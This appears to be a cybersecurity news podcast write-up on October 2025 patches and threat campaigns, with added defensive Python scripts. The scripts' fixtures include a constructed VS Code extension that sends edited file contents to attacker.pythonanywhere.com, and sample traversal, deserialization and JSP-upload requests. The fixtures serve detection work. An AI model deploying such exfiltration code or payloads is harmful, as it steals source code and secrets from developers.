Good Morning Security Gang!
Welcome back to the CyberHub Podcast, broadcasting to you with a double espresso in hand after a long night celebrating Simchat Torah. It’s one of the most joyous holidays on the Jewish calendar — dancing, food, bourbon (and maybe a little too much of it).
But as the holiday wrapped up, it was back to work, and what a day to return: a monster Patch Tuesday, critical vulnerabilities across Microsoft, Adobe, and SAP, major Chinese APT activity, VS Code supply chain trojans, $15 billion seized from a global scam empire, and new AI safety laws in California.
It’s a jam-packed show — let’s dive right in. ☕
🧩 Microsoft Patches 173 Vulnerabilities — 5 Critical, 2 Actively Exploited
Microsoft dropped an enormous 173 security fixes this month, including 5 critical CVEs and 2 under active exploitation: CVE-2025-24990, an elevation of privilege in the legacy Agere modem driver (ltmdm64.sys) that ships with Windows, and CVE-2025-59230, an elevation of privilege in the Windows Remote Access Connection Manager (RasMan). Both are local privilege escalations, which is exactly what an attacker wants once they already have a foothold on the box.
I warned, “If it’s in the KEV catalog, you patch it yesterday.”
Admins should focus on kernel-level privilege escalation, especially driver-based exploitation, because a kernel foothold is what turns one compromised workstation into a ransomware blast radius. Note the unusual fix for the modem driver: rather than patch ltmdm64.sys, Microsoft removed it from Windows, which also closes the publicly disclosed CVE-2025-24052 in the same driver; any hardware that depends on it stops working after the update. Both exploited CVEs are in CISA's KEV catalog, which puts federal agencies on a three-week patch deadline.
Action Steps:
Prioritize KEV-listed items.
Confirm reboots post-patch.
Block unsigned driver loads.
Hunt for ltmdm64.sys artifacts (the driver should be gone after patching) and for anomalous Remote Access Connection Manager (RasMan) activity.
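"Prioritize KEV-listed items" is easy to say and tedious to do across 173 fixes plus Adobe and SAP. Here is an added example (mine, not the podcast's or CISA's tooling) that joins a patch cycle's CVE list against the KEV catalog and ranks it by due date. The KEV JSON field names are CISA's; the two KEV_SAMPLE entries are a constructed excerpt whose dates are placeholders, and the short descriptions in PATCH_CYCLE are mine.

```python
"""Rank a patch cycle's CVEs by CISA KEV status and remediation due date.

Added example for this post, not the podcast's or CISA's tooling. The KEV
catalog is published as JSON at KEV_URL with the field names used here
(cveID, dueDate, knownRansomwareCampaignUse, ...). The two entries in
KEV_SAMPLE are a constructed excerpt and their dates are placeholders.
"""
import json
import urllib.request
from datetime import date

KEV_URL = ("https://www.cisa.gov/sites/default/files/feeds/"
           "known_exploited_vulnerabilities.json")

# Constructed excerpt in the KEV JSON schema; the dates are placeholders.
KEV_SAMPLE = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2025-24990", "vendorProject": "Microsoft",
     "product": "Windows", "dateAdded": "2025-10-14",
     "dueDate": "2025-11-04", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2025-59230", "vendorProject": "Microsoft",
     "product": "Windows", "dateAdded": "2025-10-14",
     "dueDate": "2025-11-04", "knownRansomwareCampaignUse": "Unknown"},
]})

# The CVEs named in this post; the short descriptions are ours.
PATCH_CYCLE = {
    "CVE-2025-24990": "Windows, Agere modem driver (ltmdm64.sys) EoP",
    "CVE-2025-59230": "Windows, Remote Access Connection Manager EoP",
    "CVE-2025-49553": "Adobe Connect, XSS, CVSS 9.3",
    "CVE-2025-42944": "SAP NetWeaver, insecure deserialization, CVSS 10.0",
    "CVE-2025-42937": "SAP Print Service, directory traversal",
    "CVE-2025-42910": "SAP SRM, unauthenticated file upload",
}


def load_kev(raw_json):
    """Index a KEV feed document by CVE id."""
    return {v["cveID"]: v for v in json.loads(raw_json)["vulnerabilities"]}


def fetch_kev(timeout=30):
    """Download the live catalog. Needs network; the demo below does not call it."""
    with urllib.request.urlopen(KEV_URL, timeout=timeout) as resp:
        return load_kev(resp.read().decode("utf-8"))


def prioritize(patched, kev, today):
    """Order patch items: KEV with ransomware use, then KEV, then the rest.

    `today` is an ISO date string. KEV rows carry days_left until CISA's
    due date (negative means overdue); non-KEV rows have days_left None.
    """
    now = date.fromisoformat(today)
    rows = []
    for cve, desc in patched.items():
        entry = kev.get(cve)
        if entry is None:
            rows.append({"cve": cve, "desc": desc, "kev": False, "tier": 2,
                         "due": None, "days_left": None})
            continue
        due = date.fromisoformat(entry["dueDate"])
        ransomware = entry.get("knownRansomwareCampaignUse", "").lower() == "known"
        rows.append({"cve": cve, "desc": desc, "kev": True,
                     "tier": 0 if ransomware else 1,
                     "due": due.isoformat(), "days_left": (due - now).days})
    # Sort by tier, then soonest deadline, then CVE id for a stable order.
    rows.sort(key=lambda r: (r["tier"],
                             10**6 if r["days_left"] is None else r["days_left"],
                             r["cve"]))
    return rows


def report(rows):
    """Render one line per item for a ticket or a chat post."""
    lines = []
    for r in rows:
        if r["kev"]:
            status = "KEV due %s (%+dd)" % (r["due"], r["days_left"])
        else:
            status = "not in KEV"
        lines.append("%s  %-26s  %s" % (r["cve"], status, r["desc"]))
    return lines


if __name__ == "__main__":
    for line in report(prioritize(PATCH_CYCLE, load_kev(KEV_SAMPLE), "2025-10-15")):
        print(line)
```

Swap `load_kev(KEV_SAMPLE)` for `fetch_kev()` to run it against the live catalog; the ordering puts anything with known ransomware use first, then by how many days you have left before CISA's deadline, which is the order the ticket queue should be in.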
🎨 Adobe Fixes 35+ Vulnerabilities — Critical in Adobe Connect
Adobe released a massive patch set covering 35+ vulnerabilities, headlined by CVE-2025-49553, a CVSS 9.3 cross-site scripting bug in Adobe Connect that Adobe rates as leading to arbitrary code execution.
Other high-severity flaws affect Magento/Commerce, the 3D tools, and Creative Cloud desktop apps.
As I said on the show, “Adobe patches are the gift that keep on giving — quick to install, but quicker to be exploited if ignored.”
Defenders should:
Upgrade Connect to the latest version.
Enable CSP + admin IP allowlisting.
Apply WAF rules to block known XSS patterns as a stopgap; a WAF narrows exposure but does not fix the bug, so it is no substitute for the upgrade.
🏢 SAP Issues 16 Patches, 3 Critical CVEs
SAP patched NetWeaver, Print Service, and SRM, including three critical flaws:
CVE-2025-42944 (CVSS 10.0): Insecure deserialization in NetWeaver.
CVE-2025-42937: Directory traversal in Print Service.
CVE-2025-42910: Unauthenticated file upload in SRM.
These bugs allow arbitrary file overwrite and code execution, threatening ERP data integrity and financial compliance (SOX).
Mitigation:
Patch immediately.
Remove the SAP admin UIs from public access, and keep the NetWeaver P4 port reachable only from the networks that need it: CVE-2025-42944 is reached over RMI-P4, not through the web UI.
Add WAF rules to Print and SRM endpoints.
Hunt for Java serialized objects (the ac ed 00 05 stream header, which reads rO0AB once base64-encoded) arriving at AS Java listeners, for traversal sequences in Print Service requests, and for unexpected file writes under the SAP directories.
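What that hunt looks like in practice, as an added example (mine, not SAP's tooling): a scanner run over proxy or WAF logs that decodes each request and flags the three shapes behind this month's SAP bugs. It assumes one JSON record per request with the body base64-encoded (the field names ts, src, method, path and body_b64 are mine), and the hosts, paths and payloads in SAMPLE_LOG are constructed, so check your own Print Service and SRM endpoint names. The P4 channel behind CVE-2025-42944 is a binary protocol rather than HTTP, so that one is controlled at the network layer, not by this scanner.

```python
"""Hunt SAP-facing HTTP logs for deserialization, traversal and upload abuse.

Added example for this post, not SAP's tooling. Assumes a proxy/WAF log with
one JSON object per request and the body base64-encoded; field names and
the sample paths are ours, not SAP's.
"""
import base64
import json
import re
from urllib.parse import unquote

JAVA_SER_MAGIC = b"\xac\xed\x00\x05"   # java.io.ObjectOutputStream header
JAVA_SER_B64 = b"rO0AB"                # the same header after base64 encoding
TRAVERSAL = re.compile(r"\.\.[\\/]")
# Upload of a server-executable file type inside a multipart body.
RISKY_UPLOAD = re.compile(rb'filename="[^"]*\.(?:jsp|jspx|war|jar|class|sh|exe)"', re.I)


def fully_decode(s, rounds=3):
    """URL-decode repeatedly so %252e%252e%252f (double-encoded ../) is seen."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse(rec):
    """Return the finding tags for one request record (empty list if clean)."""
    tags = []
    if TRAVERSAL.search(fully_decode(rec["path"])):
        tags.append("path-traversal")
    body = base64.b64decode(rec.get("body_b64", ""))
    if JAVA_SER_MAGIC in body or JAVA_SER_B64 in body:
        tags.append("java-serialized-object")
    if rec["method"] in ("POST", "PUT") and RISKY_UPLOAD.search(body):
        tags.append("executable-upload")
    return tags


def scan(log_lines):
    """Scan newline-delimited JSON records; return (src, path, tags) for hits."""
    hits = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        tags = analyse(rec)
        if tags:
            hits.append((rec["src"], rec["path"], tags))
    return hits


def b64(raw):
    return base64.b64encode(raw).decode("ascii")


# Constructed sample log: hypothetical hosts, paths and payloads.
SAMPLE_LOG = [
    json.dumps({"ts": "2025-10-15T08:00:01Z", "src": "10.1.1.20", "method": "GET",
                "path": "/irj/portal", "body_b64": ""}),
    json.dumps({"ts": "2025-10-15T08:00:07Z", "src": "203.0.113.9", "method": "POST",
                "path": "/netweaver/java/endpoint",
                "body_b64": b64(JAVA_SER_MAGIC + b"sr\x00\x11java.util.HashMap")}),
    json.dumps({"ts": "2025-10-15T08:00:09Z", "src": "203.0.113.9", "method": "GET",
                "path": "/printservice/file?name=%252e%252e%252f%252e%252e%252fetc%252fpasswd",
                "body_b64": ""}),
    json.dumps({"ts": "2025-10-15T08:00:12Z", "src": "198.51.100.4", "method": "POST",
                "path": "/srm/upload",
                "body_b64": b64(b'--x\r\nContent-Disposition: form-data; name="f"; '
                                b'filename="shell.jsp"\r\n\r\n<% %>\r\n--x--')}),
]

if __name__ == "__main__":
    for src, path, tags in scan(SAMPLE_LOG):
        print(src, path, ",".join(tags))
```

The double-encoded traversal in the third record is the reason the decoder loops: a single `unquote` leaves `%2e%2e%2f` in place and the pattern never fires. Feed it the raw bodies your proxy keeps, not a truncated summary, or the serialization header will be cut off before it is logged.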
🕵️ Chinese APTs Maintain Persistence Through GIS Servers
ReliaQuest uncovered a year-long espionage campaign tied to Flax Typhoon, in which the attackers turned an ArcGIS Server Object Extension (SOE) into a web shell to maintain stealthy persistence in municipal and utility networks. They used SoftEther VPN bridges for encrypted C2 traffic over port 443 and custom Base64-encoded commands.
“These guys don’t smash and grab — they move in, unpack their bags, and stay for a year,” I said.
To defend:
Audit ArcGIS SOE configurations: list every deployed extension and who registered it, and treat any SOE you cannot trace to a change ticket as suspect.
Block web shell uploads, which here means restricting who can publish or register SOEs rather than relying on file-type filters.
Rotate portal and ArcGIS Server admin credentials.
Hunt for SoftEther auto-start entries and egress anomalies to 172.86.113.142.
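The egress side of that hunt, as an added example (mine, not ReliaQuest's or Esri's tooling): three checks over a GIS server's flow records that catch the shapes this campaign leaves, a known-bad destination, hours-long TLS sessions that are really a VPN bridge, and near-periodic check-ins. It assumes flow or firewall records with the fields start, src, dst, dport and duration_s (my names) and an allowlist of hosts the server legitimately talks to; the IOC is the IP from the post, and SAMPLE_FLOWS, the allowlist and the server address are constructed.

```python
"""Hunt a GIS server's egress for C2 over 443 and a known IOC.

Added example for this post, not ReliaQuest's or Esri's tooling. Field
names, the allowlist and SAMPLE_FLOWS are ours; the IOC is from the post.
"""
from datetime import datetime
from itertools import groupby
from statistics import mean, pstdev

IOCS = {"172.86.113.142"}
ALLOWLIST = {"10.20.30.9", "10.20.30.10"}   # constructed: database and portal hosts


def parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def ioc_hits(flows):
    """Any flow to a known-bad destination is a hit, whatever the port."""
    return [f for f in flows if f["dst"] in IOCS]


def long_lived_tls(flows, min_seconds=3600):
    """Hours-long 443 sessions to unlisted hosts look like a VPN bridge, not HTTPS."""
    return [f for f in flows if f["dport"] == 443 and f["dst"] not in ALLOWLIST
            and f["duration_s"] >= min_seconds]


def beacons(flows, min_count=5, max_cv=0.1):
    """Flag (src, dst, dport) tuples whose connection starts are near-periodic.

    The coefficient of variation of the gaps between starts is low for a
    check-in loop and high for human-driven traffic.
    """
    key = lambda f: (f["src"], f["dst"], f["dport"])
    out = []
    for k, group in groupby(sorted(flows, key=lambda f: (key(f), f["start"])), key=key):
        if k[1] in ALLOWLIST:
            continue
        starts = [parse_ts(f["start"]) for f in group]
        if len(starts) < min_count:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            out.append({"src": k[0], "dst": k[1], "dport": k[2],
                        "count": len(starts), "interval_s": round(avg, 1)})
    return out


def hunt(flows):
    return {"ioc": ioc_hits(flows), "tunnels": long_lived_tls(flows),
            "beacons": beacons(flows)}


def _flow(start, src, dst, dport, duration_s):
    return {"start": start, "src": src, "dst": dst, "dport": dport, "duration_s": duration_s}


ARCGIS = "10.20.30.5"  # constructed ArcGIS Server address
SAMPLE_FLOWS = [
    # roughly five-minute check-ins to the IOC, with a few seconds of jitter
    _flow("2025-10-15T02:00:00Z", ARCGIS, "172.86.113.142", 443, 2),
    _flow("2025-10-15T02:05:03Z", ARCGIS, "172.86.113.142", 443, 2),
    _flow("2025-10-15T02:09:58Z", ARCGIS, "172.86.113.142", 443, 3),
    _flow("2025-10-15T02:15:01Z", ARCGIS, "172.86.113.142", 443, 2),
    _flow("2025-10-15T02:20:02Z", ARCGIS, "172.86.113.142", 443, 2),
    _flow("2025-10-15T02:24:59Z", ARCGIS, "172.86.113.142", 443, 2),
    # one five-hour TLS session to an unlisted host: bridge-shaped
    _flow("2025-10-15T01:00:00Z", ARCGIS, "198.51.100.77", 443, 5 * 3600),
    # ordinary traffic to allowlisted internal hosts at irregular times
    _flow("2025-10-15T02:01:00Z", ARCGIS, "10.20.30.9", 1433, 1),
    _flow("2025-10-15T02:07:30Z", ARCGIS, "10.20.30.9", 1433, 1),
    _flow("2025-10-15T02:31:12Z", ARCGIS, "10.20.30.10", 443, 4),
]

if __name__ == "__main__":
    for name, rows in hunt(SAMPLE_FLOWS).items():
        print(name, rows)
```

The IOC match is the easy win and will go stale the day the operator moves; the tunnel and beacon checks are what keep working afterwards, because a GIS server has no business holding a five-hour TLS session to an unknown host or checking in on a timer.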
🇹🇼 China Targets Taiwan with 2.8 Million Daily Intrusions
Taiwan’s intelligence service reported 2.8 million intrusion attempts per day, a 17% increase year over year, with over 10,000 fake social media accounts spreading AI-generated disinformation ahead of the 2026 elections.
This campaign mirrors China’s “Hong Kong playbook” — infiltrate, destabilize, and manipulate public sentiment. The cyber component? Continuous probing of power grids, government networks, and defense firms.
As I said bluntly: “Beijing doesn’t need a cyber Pearl Harbor — it’s already running a cyber occupation.”
🔐 PolarEdge Backdoor Exploits Routers and NAS Devices
Researchers at Sekoia profiled PolarEdge, a stealthy backdoor that runs its own TLS server and speaks a custom binary protocol. It targets routers and NAS devices from Cisco, ASUS, QNAP, and Synology, offering remote access, daily fingerprinting, and embedded web shell injection.
This campaign began in 2023, showing how IoT and home networks are becoming C2 infrastructure for global threat actors.
CISO takeaway: segment IoT and edge devices from everything else, disable unused services and internet-facing management, keep firmware current, and retire devices past end of support. Because PolarEdge brings its own TLS listener, an unexpected open port on an edge device is a better signal than anything you will see in the vendor's web UI.
💻 Malicious VS Code Extensions Reappear — Crypto Theft Campaign
A malicious VS Code extension resurfaced on Open VSX, the registry that Cursor and Windsurf pull extensions from, posing as a C++ Playground extension. These backdoored extensions exfiltrate source code as you type, steal secrets, and mine cryptocurrency.
The same actor, TigerJack, previously got infected versions into the VS Code Marketplace, was removed, and simply republished.
Defenders should:
Pin extensions by hash.
Block openvsx.org/unpkg.com domains where policy allows it; Cursor and Windsurf users will lose extension installs, so pair the block with a curated internal mirror.
Monitor for unusual on-text-change handlers (vscode.workspace.onDidChangeTextDocument) paired with outbound HTTP to pythonanywhere.com.
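Here is what "pin by hash" and "watch for on-text-change plus outbound HTTP" look like as a script, added as an example of mine rather than Microsoft's, Open VSX's or any researcher's tooling. It assumes extensions sit unpacked under one directory the way ~/.vscode/extensions does, and that a digest allowlist is maintained out of band. The sample extension it writes (publisher, name and the pythonanywhere hostname) is constructed to mimic the reported behaviour, not the real malicious package.

```python
"""Hash-pin installed VS Code extensions and flag keystroke-exfil patterns.

Added example for this post, not Microsoft's or Open VSX's tooling. Assumes
extensions are installed unpacked under one directory; the allowlist and
the sample extension (publisher, name, hostname) are constructed.
"""
import hashlib
import json
import os
import re
import tempfile

# Out-of-band allowlist of directory digests; a placeholder value here.
ALLOWED_DIGESTS = {"0" * 64}

EDITOR_HOOKS = re.compile(r"onDidChangeTextDocument|onDidSaveTextDocument|onDidOpenTextDocument")
NETWORK = re.compile(r"https?\.request\(|\bfetch\(|\baxios\b|net\.connect\(|XMLHttpRequest")
HOSTS = re.compile(r"""https?://([A-Za-z0-9.-]+)|\bhost(?:name)?\s*:\s*['"]([A-Za-z0-9.-]+)['"]""")
EXEC = re.compile(r"child_process|\beval\(|new Function\(")


def dir_digest(root):
    """SHA-256 over sorted relative paths and contents; same bytes, same digest."""
    h = hashlib.sha256()
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            h.update(os.path.relpath(full, root).replace(os.sep, "/").encode() + b"\0")
            with open(full, "rb") as fh:
                h.update(fh.read())
            h.update(b"\0")
    return h.hexdigest()


def is_pinned(root, allowlist):
    return dir_digest(root) in allowlist


def scan_sources(root):
    """Return findings; an editor hook plus network I/O is the exfiltration shape."""
    findings, hooks, net = [], False, False
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".js"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if EDITOR_HOOKS.search(line):
                        hooks = True
                        findings.append({"kind": "editor-hook", "file": rel, "line": lineno})
                    if NETWORK.search(line):
                        net = True
                        findings.append({"kind": "network-call", "file": rel, "line": lineno})
                    for m in HOSTS.finditer(line):
                        findings.append({"kind": "external-host", "file": rel,
                                         "line": lineno, "host": m.group(1) or m.group(2)})
                    if EXEC.search(line):
                        findings.append({"kind": "code-exec", "file": rel, "line": lineno})
    if hooks and net:
        findings.append({"kind": "exfiltration-pattern", "file": "*", "line": 0})
    return findings


def make_sample_extension(base):
    """Write a constructed extension that mimics the reported behaviour."""
    root = os.path.join(base, "demo-publisher.cpp-playground-1.0.0")  # hypothetical
    os.makedirs(root, exist_ok=True)
    with open(os.path.join(root, "package.json"), "w") as fh:
        json.dump({"name": "cpp-playground", "publisher": "demo-publisher",
                   "version": "1.0.0", "main": "./extension.js",
                   "activationEvents": ["*"]}, fh)
    with open(os.path.join(root, "extension.js"), "w") as fh:
        fh.write(
            "const vscode = require('vscode');\n"
            "const https = require('https');\n"
            "function activate() {\n"
            "  vscode.workspace.onDidChangeTextDocument(e => {\n"
            "    const body = JSON.stringify({f: e.document.fileName, t: e.document.getText()});\n"
            "    const req = https.request({host: 'attacker.pythonanywhere.com', path: '/c', method: 'POST'});\n"
            "    req.end(body);\n"
            "  });\n"
            "}\nmodule.exports = { activate };\n")
    return root


def demo():
    """Build the constructed extension in a temp dir and analyse it."""
    root = make_sample_extension(tempfile.mkdtemp(prefix="ext-audit-"))
    findings = scan_sources(root)
    return {"digest": dir_digest(root), "pinned": is_pinned(root, ALLOWED_DIGESTS),
            "kinds": sorted({f["kind"] for f in findings}),
            "hosts": sorted({f["host"] for f in findings if f["kind"] == "external-host"})}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Point `scan_sources` and `dir_digest` at each directory under your extensions folder on a schedule; a digest that is not on the allowlist means the extension changed under you, and an editor hook paired with a network call deserves a human look even when the extension is otherwise popular. Obfuscated or minified extensions defeat the regexes, so treat "no findings" on a bundle you cannot read as a reason to inspect, not a pass.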
💸 Feds Seize $15 Billion from Cambodian Scam Empire
In a joint operation, U.S. Treasury, UK FCDO, and Europol sanctioned and seized $15 billion in assets linked to Royal Group and Prince Holdings, run by Cambodian tycoon Kith Meng.
These networks operated slave-labor scam compounds, forcing victims into romance scams, crypto fraud, and money laundering through over 117 shell companies.
I said it loud and clear: “This isn’t a cybercrime ring — it’s modern-day slavery.”
Authorities also indicted Chinese national Chen Zhi, accused of managing over ten compounds across Southeast Asia.
🧒 California Passes Age Verification and Chatbot Safety Laws
California enacted the Digital Age Assurance Act, requiring OS and app stores to age-gate devices during setup and enforce age restrictions at the app level. Violations can reach $7,500 per child.
A separate bill mandates suicide-prevention safeguards in chatbots, marking the first state-level regulation of AI conversational safety.
While I’m a free-market advocate, I said, “This is exactly what government should do — set guardrails where kids can’t protect themselves.”
🧠 James Azar’s CISO Take
This Patch Tuesday is a reminder that cyber resilience starts with fundamentals — patching, monitoring, and prioritization. But the sheer volume of vulnerabilities underscores a deeper issue: security debt. Every unpatched driver, every misconfigured app, becomes tomorrow’s exploit chain. Practitioners must think less about perfection and more about speed and visibility.
On the geopolitical side, China’s hybrid warfare and global scam syndicates show how cyber, influence, and finance are merging into one continuous threat landscape. The new California AI laws, however, offer a glimpse of balance — where technology is tempered with responsibility. For CISOs, the path forward is clear: focus on people, process, and patching — everything else is secondary.
✅ Action Items
🧩 Prioritize CVE-2025-24990 and CVE-2025-59230 on every Windows host; confirm reboot completion.
🎨 Patch Adobe Connect (CVE-2025-49553) and Magento; enable WAF XSS filtering.
🏢 Apply SAP October notes; remove Admin UIs from public networks.
🕵️ Audit ArcGIS SOE servers; block web shell uploads and rotate credentials.
🇹🇼 Monitor for Chinese influence ops; validate social media sources.
🔐 Segment IoT; disable remote access to routers and NAS devices.
💻 Restrict third-party dev extensions; hash-verify plugins.
💸 Tighten fraud controls on payments linked to scam compounds; educate users on scam awareness.
🧒 Review chatbot and child data compliance ahead of CA enforcement.
And that’s a wrap for today’s show, Security Gang. Patch smart, stay vigilant, and we’ll be back tomorrow at 9 a.m. Eastern with all the latest cybersecurity news. As always, stay cyber safe! ☕👊